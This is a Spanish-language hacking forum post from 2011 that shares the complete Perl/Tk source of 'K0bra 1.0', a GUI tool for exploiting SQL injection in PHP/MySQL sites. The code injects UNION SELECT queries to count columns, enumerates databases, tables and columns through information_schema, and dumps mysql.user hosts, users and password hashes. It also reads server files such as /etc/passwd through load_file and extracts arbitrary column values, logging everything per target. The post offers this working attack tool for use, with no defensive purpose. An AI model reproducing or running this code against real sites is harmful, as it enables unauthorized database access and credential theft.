help_outline
Ayudanos!
play_arrow
  3. [Perl Tk] K0bra 1.0
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.
« anterior próximo »
Páginas: [1]   Ir Abajo

[Perl Tk] K0bra 1.0

  • 0 Respuestas
  • 1133 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil

[Perl Tk] K0bra 1.0

« en: Julio 03, 2011, 10:01:34 pm »
Hola a les dejo un programa para escanear la vulnerabilidad SQL de una forma
avanzada

Opciones

  • Scanea el numero de columnas
  • Busca el numero magico automaticamente y muestra data sobre la DB
  • Dumpea mysql.user
  • Lista bases de datos encontradas , asi como tablas y columnas
  • Permite visualizar archivos con load_file()
  • Codificacion y decodificacion para ascii y hex
  • Dumpea valores sobre cualquier columna
  • Guarda todo los registros en un archivo de texto con el nombre de la web



Imagenes







Código: Perl
  1. #!usr/bin/perl
  2. #K0bra 1.0 (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use Tk::ROText;
  6. use LWP::UserAgent;
  7. use URI::Split qw(uri_split);
  8. use Win32;
  9.  
  10. my $bypass = "--";
  11. my $save = "";
  12.  
  13. if ($^O eq 'MSWin32') {
  14. use Win32::Console;
  15. Win32::Console::Free();
  16. }
  17.  
  18. my $nave = LWP::UserAgent->new();
  19. $nave->timeout(5);
  20. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  21.  
  22. my $logo = MainWindow->new();
  23. $logo->title("k0bra 1.0 (C) Doddy Hackman 2011");
  24. $logo->geometry("500x510+20+20");
  25. $logo->resizable(0,0);
  26. $logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-y=>20);
  27. my $targetero = $logo->Entry(-width=>50,-text=>"http://127.0.0.1/sql.php?id=")->place(-y=>23,-x=>90);
  28. $logo->Button(-text=>"Scan",-width=>10,-command=>\&start)->place(-y=>20,-x=>400);
  29. $logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-y=>70);
  30. $logo->Button(-text=>"Get DBS",-width=>10,-command=>\&getdbs)->place(-y=>110,-x=>40);
  31. $logo->Button(-text=>"Get Tables",-width=>10,-command=>\&schematablesdb)->place(-y=>110,-x=>120);
  32. $logo->Button(-text=>"Get Columns",-width=>10,-command=>\&schemacolumnsdb)->place(-y=>110,-x=>200);
  33. $logo->Button(-text=>"mysql users",-width=>15,-command=>\&mynow)->place(-y=>110,-x=>280);
  34. $logo->Button(-text=>"load_file",-width=>10,-command=>\&myfile)->place(-y=>110,-x=>390);
  35.  
  36. $logo->Button(-text=>"Dump",-width=>10,-command=>\&dum)->place(-y=>150,-x=>90);
  37. $logo->Button(-text=>"Hex",-width=>10,-command=>\&per1)->place(-y=>150,-x=>170);
  38. $logo->Button(-text=>"ASCII",-width=>15,-command=>\&per2)->place(-y=>150,-x=>250);
  39. $logo->Button(-text=>"Show Logs",-width=>10,-command=>\&china)->place(-y=>150,-x=>360);
  40.  
  41. $logo->Label(-text=>"Details : ",-font=>"Impact1")->place(-y=>230,-x=>90);
  42.  
  43. my $informatero = $logo->Listbox(-height=>5,-width=>40)->place(-y=>210,-x=>160);
  44.  
  45. $logo->Label(-text=>"Databases",-font=>"Impact1")->place(-y=>320,-x=>60);
  46. $logo->Label(-text=>"Tables",-font=>"Impact1")->place(-y=>320,-x=>190);
  47. $logo->Label(-text=>"Columns",-font=>"Impact1")->place(-y=>320,-x=>330);
  48.  
  49. my $datero = $logo->Listbox(-width=>20)->place(-y=>350,-x=>40);
  50. my $tablero = $logo->Listbox(-width=>20)->place(-y=>350,-x=>180);
  51. my $columnero = $logo->Listbox(-width=>20)->place(-y=>350,-x=>320);
  52.  
  53. MainLoop;
  54.  
  55. sub start {
  56.  
  57. $informatero->delete("0.0","end");
  58. $datero->delete("0.0","end");
  59. $tablero->delete("0.0","end");
  60. $columnero->delete("0.0","end");
  61.  
  62. my $tengo = $targetero->get;
  63.  
  64. my ($gen,$save,$control) = &length($tengo,"--");
  65. if ($control eq 1) {
  66. $logo->update;
  67. $targetero->configure(-text=>$gen);
  68. details($gen,$bypass,$save);
  69. } else {
  70. Win32::MsgBox("Not found length columns",0,"K0bra 1.0");
  71. }
  72. }
  73.  
  74. sub length {
  75. my $rows  = "0";
  76. my $asc;
  77. my $page = $_[0];
  78. ($pass1,$pass2) = &bypass($_[1]);
  79. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  80. $code = toma($inyection);
  81. $logo->update;
  82.  
  83. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  84.  
  85. $logo->update;
  86.  
  87. my $testar1 = toma($page."1".$pass1."and".$pass1."1=0".$pass2);
  88. my $testar2 = toma($page."1".$pass1."and".$pass1."1=1".$pass2);
  89.  
  90. unless ($testar1 eq $testar2) {
  91. my $patha = $1;
  92. $logo->update;
  93. chomp $patha;
  94. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  95. $total = "1";
  96. for my $rows(2..200) {
  97. $logo->update;
  98. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  99. $total.= ",".$rows;
  100. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  101. $test = toma($injection);
  102. if ($test=~/RATSXPDOWN/) {
  103. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  104. $control = 1;
  105. my $save = comer($_[0]);
  106. savefile($save.".txt","\n[Target confirmed] : $page");
  107. savefile($save.".txt","[Bypass] : $_[1]\n");
  108. savefile($save.".txt","[Limit] : The site has $rows columns");
  109. savefile($save.".txt","[Data] : The number @number print data");
  110. $informatero->insert("end","[+] The site has $rows columns");
  111. $informatero->insert("end","[+] The number @number print data");
  112. if ($patha) {
  113. savefile($save.".txt","[Full Path Discloure] : $patha");
  114. }
  115. $total=~s/$number[0]/hackman/;
  116. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  117. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  118. }
  119. }
  120. }
  121. } else {
  122. Win32::MsgBox("Not vulnerable",0,"K0bra 1.0");
  123. next;
  124. }
  125. }
  126.  
  127. sub details {
  128. my ($page,$bypass,$save) = @_;
  129. ($pass1,$pass2) = &bypass($bypass);
  130. savefile($save.".txt","\n");
  131. if ($page=~/(.*)hackman(.*)/ig) {
  132. my  ($start,$end) = ($1,$2);
  133. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  134. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  135. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  136. $test1 = toma($inforschema);
  137. $test2 = toma($mysqluser);
  138. $informatero->insert("end","");
  139. if ($test2=~/ERTOR854/ig) {
  140. savefile($save.".txt","[mysql.user] : ON");
  141. $informatero->insert("end","[mysql.user] : ON");
  142. } else {
  143. $informatero->insert("end","[mysql.user] : OFF");
  144. savefile($save.".txt","[mysql.user] : OFF");
  145. }
  146. if ($test1=~/ERTOR854/ig) {
  147. $informatero->insert("end","[information_schema.tables] : ON");
  148. savefile($save.".txt","[information_schema.tables] : ON");
  149. } else {
  150. $informatero->insert("end","[information_schema.tables] : OFF");
  151. savefile($save.".txt","[information_schema.tables] : OFF");
  152. }
  153. if ($test3=~/ERTOR854/ig) {
  154. $informatero->insert("end","[load_file] : ON");
  155. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  156. }
  157. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  158. $injection = $start.$concat.$end.$pass2;
  159. $code = toma($injection);
  160. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  161. $informatero->insert("end","");
  162. $informatero->insert("end","[+] DB Version : $1");
  163. $informatero->insert("end","[+] DB Name : $2");
  164. $informatero->insert("end","[+] user_name : $3");
  165. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  166. } else {
  167. Win32::MsgBox("Not Found DB Info",0,"K0bra 1.0");
  168. }
  169. }
  170. }
  171.  
  172.  
  173. sub getdbs {
  174. $datero->delete("0.0","end");
  175. my $page = $targetero->get;
  176. my $save = comer($page);
  177. my $page1 = $page;
  178. savefile($save.".txt","\n");
  179. ($pass1,$pass2) = &bypass($bypass);
  180. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  181. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  182. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  183. my $limita = $1;
  184. $logo->update;
  185. savefile($save.".txt","[+] Databases Length : $limita\n");
  186. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  187. $real = "1";
  188. for my $limit(0..$limita) {
  189. $logo->update;
  190. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  191. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  192. my $control = $1;
  193. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  194. $datero->insert("end",$control);
  195. savefile($save.".txt","[Database $real Found] : $control");
  196. $real++;
  197. }
  198. }
  199. }
  200. } else {
  201. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  202. }
  203. }
  204.  
  205.  
  206. sub schematablesdb {
  207.  
  208. $tablero->delete("0.0","end");
  209.  
  210. my $page = $targetero->get;
  211.  
  212. my $save = comer($page);
  213.  
  214. $d = $datero->curselection();
  215.  
  216. for my $id (@$d) {
  217. my $db = $datero->get($id);
  218.  
  219. my $page1 = $page;
  220. savefile($save.".txt","\n");
  221. ($pass1,$pass2) = &bypass($bypass);
  222. savefile($save.".txt","[DB] : $db");
  223. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  224. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  225. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  226. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  227. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  228. $logo->update;
  229. savefile($save.".txt","[+] Tables Length :  $1\n");
  230. my $limit = $1;
  231. $real = "1";
  232. for my $lim(0..$limit) {
  233. $logo->update;
  234. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  235. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  236. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  237. my $table = $1;
  238. chomp $table;
  239. savefile($save.".txt","[Table $real Found : $table ]");
  240. $tablero->insert("end",$db.".".$table);
  241. $real++;
  242. }}
  243. } else {
  244. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  245. }}}
  246.  
  247. sub schemacolumnsdb {
  248.  
  249. $columnero->delete("0.0","end");
  250.  
  251. my $page = $targetero->get;
  252. my $save = comer($page);
  253.  
  254. $d = $tablero->curselection();
  255.  
  256. for my $id (@$d) {
  257. my $da = $tablero->get($id);
  258.  
  259. if ($da=~/(.*)\.(.*)/) {
  260. my ($db,$table) = ($1,$2);
  261.  
  262. my $page3 = $page;
  263. my $page4 = $page;
  264.  
  265. savefile($save.".txt","\n");
  266. ($pass1,$pass2) = &bypass($bypass);
  267. savefile($save.".txt","\n[DB] : $db");
  268. savefile($save.".txt","[Table] : $table");
  269. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  270. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  271. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  272. savefile($save.".txt","[Columns length : $1 ]\n");
  273. my $si = $1;
  274. chomp $si;
  275. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  276. $real = "1";
  277. for my $limit2(0..$si) {
  278. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  279. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  280. $columnero->insert("end",$1);
  281. savefile($save.".txt","[Column $real] : $1");
  282. $real++;
  283. }
  284. }
  285. } else {
  286. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  287. }
  288. }
  289. }
  290. }
  291.  
  292. sub mynow {
  293.  
  294. my $p = $targetero->get;
  295.  
  296. $mi = MainWindow->new();
  297. $mi->title("Mysql Extractor");
  298. $mi->geometry("500x310+20+20");
  299. $mi->resizable(0,0);
  300.  
  301. $mi->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-y=>20);
  302. my $guix = $mi->Entry(-width=>40,-text=>$p)->place(-y=>23,-x=>110);
  303. $mi->Button(-width=>10,-text=>"Extract",-command=>\&tengorax)->place(-y=>20,-x=>360);
  304.  
  305. $mi->Label(-text=>"Host",-font=>"Impact1")->place(-x=>60,-y=>120);
  306. $mi->Label(-text=>"User",-font=>"Impact1")->place(-x=>200,-y=>120);
  307. $mi->Label(-text=>"Password",-font=>"Impact1")->place(-x=>360,-y=>120);
  308.  
  309. my $hostero = $mi->Listbox(-width=>20)->place(-y=>150,-x=>40);
  310. my $usero = $mi->Listbox(-width=>23)->place(-y=>150,-x=>180);
  311. my $pasero = $mi->Listbox(-width=>20)->place(-y=>150,-x=>340);
  312.  
  313.  
  314. sub tengorax {
  315.  
  316. my $page = $guix->get;
  317. my $save = comer($page);
  318.  
  319. my $cop = $page;
  320. my $cop1 = $page;
  321. savefile($save.".txt","\n");
  322.  
  323. ($pass1,$pass2) = &bypass($bypass);
  324. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  325. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  326. if ($code=~/RATSXPDOWN/ig){
  327. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  328. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  329. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  330. $mi->update;
  331. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  332. for my $limit(0..$1) {
  333. $mi->update;
  334. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  335. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  336. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  337. $mi->update;
  338. $hostero->insert("end",$1);
  339. $usero->insert("end",$2);
  340. $pasero->insert("end",$3);
  341. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  342. } else {
  343. last;
  344. }}}
  345. } else {
  346. Win32::MsgBox("mysql.user not found",0,"K0bra 1.0");
  347. }
  348. }
  349. }
  350.  
  351. sub myfile {
  352.  
  353. my $pag = $targetero->get;
  354.  
  355. $loa = MainWindow->new();
  356. $loa->title("load_file helper");
  357. $loa->geometry("380x400+20+20");
  358. $loa->resizable(0,0);
  359.  
  360. $loa->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>20,-y=>20);
  361. my $aa = $loa->Entry(-width=>40,-text=>$pag)->place(-y=>23,-x=>80);
  362. $loa->Label(-text=>"File : ",-font=>"Impact1")->place(-y=>60,-x=>23);
  363. my $tea = $loa->Entry(-width=>20,-text=>"C:\leer.txt")->place(-y=>63,-x=>63);
  364. $loa->Button(-text=>"Encode",-width=>8,-command=>\&eno)->place(-y=>62,-x=>200);
  365. $loa->Button(-text=>"Show",-width=>8,-command=>\&ena)->place(-y=>62,-x=>263);
  366.  
  367. $loa->Label(-text=>"Output",-font=>"Impact1")->place(-x=>160,-y=>130);
  368. my $mo = $loa->ROText(-width=>45,-height=>15)->place(-y=>170,-x=>25);
  369.  
  370. sub eno {
  371. my $t = $tea->get;
  372. if ($t=~/0x/) {
  373. $tea->configure(-text=>decode($t));
  374. } else {
  375. $tea->configure(-text=>encode($t));
  376. }
  377. }
  378.  
  379. sub ena {
  380.  
  381. $mo->delete("0.0","end");
  382.  
  383. my $page = $aa->get;
  384. my $save = comer($page);
  385.  
  386. savefile($save.".txt","\n");
  387. ($pass1,$pass2) = &bypass($bypass);
  388. if ($page =~/(.*)hackman(.*)/g) {
  389. my $start = $1; my $end = $2;
  390. my $file = $tea->get;
  391. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
  392. $code = toma($start.$concat.$end.$pass2);
  393. if ($code =~/ERTOR854(.*)ERTOR854/g) {
  394. $mo->insert("end",$1);
  395. savefile($save.".txt","[File Found] : $file");
  396. savefile($save.".txt","\n[Source Start]\n");
  397. savefile($save.".txt","$1");
  398. savefile($save.".txt","\n[Source End]\n");
  399. } else {
  400. Win32::MsgBox("Error",0,"K0bra 1.0");
  401. }}}}
  402.  
  403. sub dum {
  404.  
  405. my $pa = $targetero->get;
  406.  
  407. $max = MainWindow->new();
  408. $max->title("Dump Values");
  409. $max->geometry("480x380+20+20");
  410. $max->resizable(0,0);
  411.  
  412. $max->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-y=>20);
  413. my $tata = $max->Entry(-width=>40,-text=>$pa)->place(-y=>23,-x=>110);
  414.  
  415. $max->Label(-text=>"Table : ",-font=>"Impact1")->place(-x=>50,-y=>60);
  416. my $tato = $max->Entry(-width=>20)->place(-x=>105,-y=>63);
  417.  
  418. $max->Label(-text=>"Column1 : ",-font=>"Impact1")->place(-y=>90,-x=>50);
  419. my $tatu = $max->Entry(-width=>20)->place(-x=>130,-y=>93);
  420.  
  421. $max->Label(-text=>"Column2 : ",-font=>"Impact1")->place(-y=>130,-x=>50);
  422. my $tita= $max->Entry(-width=>20)->place(-y=>133,-x=>130);
  423.  
  424.  
  425. $max->Button(-width=>10,-text=>"Extract",-command=>\&tengor)->place(-y=>20,-x=>360);
  426.  
  427. $max->Label(-text=>"Column1",-font=>"Impact1")->place(-x=>100,-y=>180);
  428. $max->Label(-text=>"Column2",-font=>"Impact1")->place(-x=>300,-y=>180);
  429.  
  430. my $duta1 = $max->Listbox(-width=>20)->place(-y=>210,-x=>70);
  431. my $duta2 = $max->Listbox(-width=>23)->place(-y=>210,-x=>260);
  432.  
  433.  
  434. sub tengor {
  435.  
  436. $duta1->delete("0.0","end");
  437. $duta2->delete("0.0","end");
  438.  
  439. my $page = $tata->get;
  440. my $tabla = $tato->get;
  441. my $col1 = $tatu->get;
  442. my $col2 = $tita->get;
  443.  
  444. my $save = comer($page);
  445.  
  446. savefile($save.".txt","\n");
  447.  
  448. ($pass1,$pass2) = &bypass($bypass);
  449. if ($page=~/(.*)hackman(.*)/){
  450. my $start = $1;
  451. my $end = $2;
  452. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($col1),char(69,82,84,79,82,56,53,52))))";
  453. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$tabla.$pass2);
  454. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$col1,char(69,82,84,79,82,56,53,52),$col2,char(69,82,84,79,82,56,53,52))))";
  455. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  456. $tota = $1;
  457. savefile($save.".txt","[Table] : $tabla");
  458. savefile($save.".txt","[+] Length of the rows: $tota\n");
  459. savefile($save.".txt","[$col1] [$col2]\n");
  460. for my $limit(0..$tota) {
  461. chomp $limit;
  462. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$tabla.$pass1."limit".$pass1.$limit.",1".$pass2);
  463. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  464. savefile($save.".txt","[$col1] : $1   [$col2] : $2");
  465. $duta1->insert("end",$1);
  466. $duta2->insert("end",$2);
  467. } else {
  468. last;
  469. }}
  470. } else {
  471. Win32::MsgBox("Error",0,"K0bra 1.0");
  472. }}}}
  473.  
  474. sub per1 {
  475.  
  476. my $he = MainWindow->new();
  477. $he->title("Hex Converter (C) Doddy Hackman 2011");
  478. $he->geometry("420x70+20+20");
  479. $he->resizable(0,0);
  480. $he->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-y=>20);
  481. my $cam = $he->Entry(-width=>30)->place(-y=>24,-x=>65);
  482. $he->Button(-text=>"Encode",-width=>10,-command=>\&paso1)->place(-y=>20,-x=>255);
  483. $he->Button(-text=>"Decode",-width=>10,-command=>\&paso2)->place(-y=>20,-x=>325);
  484.  
  485. sub paso1 {
  486.  
  487. my $caca = $cam->get();
  488. chomp $caca;
  489.  
  490. $cam->configure(-text=>encode($caca));
  491.  
  492. }
  493.  
  494. sub paso2 {
  495.  
  496. my $caca = $cam->get();
  497. chomp $caca;
  498.  
  499. $cam->configure(-text=>decode($caca));
  500.  
  501. }
  502. }
  503.  
  504.  
  505. sub per2 {
  506.  
  507. my $hexae = MainWindow->new();
  508. $hexae->title("Ascii Converter (C) Doddy Hackman 2011");
  509. $hexae->geometry("420x70+20+20");
  510. $hexae->resizable(0,0);
  511. $hexae->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-y=>20);
  512. my $cama = $hexae->Entry(-width=>30)->place(-y=>24,-x=>65);
  513. $hexae->Button(-text=>"Encode",-width=>10,-command=>\&paso3)->place(-y=>20,-x=>255);
  514. $hexae->Button(-text=>"Decode",-width=>10,-command=>\&paso4)->place(-y=>20,-x=>325);
  515.  
  516.  
  517. sub paso3 {
  518.  
  519. my $caca = $cama->get();
  520. chomp $caca;
  521.  
  522. $cama->configure(-text=>ascii($caca));
  523.  
  524. }
  525.  
  526. sub paso4 {
  527.  
  528. my $caca = $cama->get();
  529. chomp $caca;
  530.  
  531. $cama->configure(-text=>ascii_de($caca));
  532.  
  533. }
  534.  
  535. }
  536.  
  537. sub china {
  538. my $de = $targetero->get;
  539. my $save = comer($de);
  540. my $file = $save.".txt";
  541. system("start logs/webs/$file");
  542. }
  543.  
  544. sub bypass {
  545. if ($_[0] eq "/*") { return ("/**/","/*"); }
  546. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  547. else {return ("+","--");}}
  548.  
  549. sub ascii {
  550. return join ',',unpack "U*",$_[0];
  551. }
  552.  
  553. sub ascii_de {
  554. $_[0] = join q[], map { chr } split q[,],$_[0];
  555. return $_[0];
  556. }
  557.  
  558.  
  559. sub encode {
  560. my $string = $_[0];
  561. $hex = '0x';
  562. for (split //,$string) {
  563. $hex .= sprintf "%x", ord;
  564. }
  565. return $hex;
  566. }
  567.  
  568. sub decode {
  569. $_[0] =~ s/^0x//;
  570. $encode = join q[], map { chr hex } $_[0] =~ /../g;
  571. return $encode;
  572. }
  573.  
  574.  
  575. sub toma {
  576. return $nave->get($_[0])->content;
  577. }
  578.  
  579. sub savefile {
  580. open (SAVE,">>logs/webs/".$_[0]);
  581. print SAVE $_[1]."\n";
  582. close SAVE;
  583. }
  584.  
  585. sub comer {
  586. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  587. return $auth;
  588. }
  589.  
  590. # ¿ The End ?
  591.  
« Última modificación: Julio 17, 2011, 03:43:04 am por Sthefano02 »
En línea
Páginas: [1]   Ir Arriba
« anterior próximo »
 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

 Respuestas: 2
Vistas: 3342 		Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

 Respuestas: 1
Vistas: 1603 		Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Search in google for scan SQLI

Iniciado por BigBear

 Respuestas: 0
Vistas: 1388 		Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

 Respuestas: 0
Vistas: 1208 		Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

 Respuestas: 0
Vistas: 1472 		Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX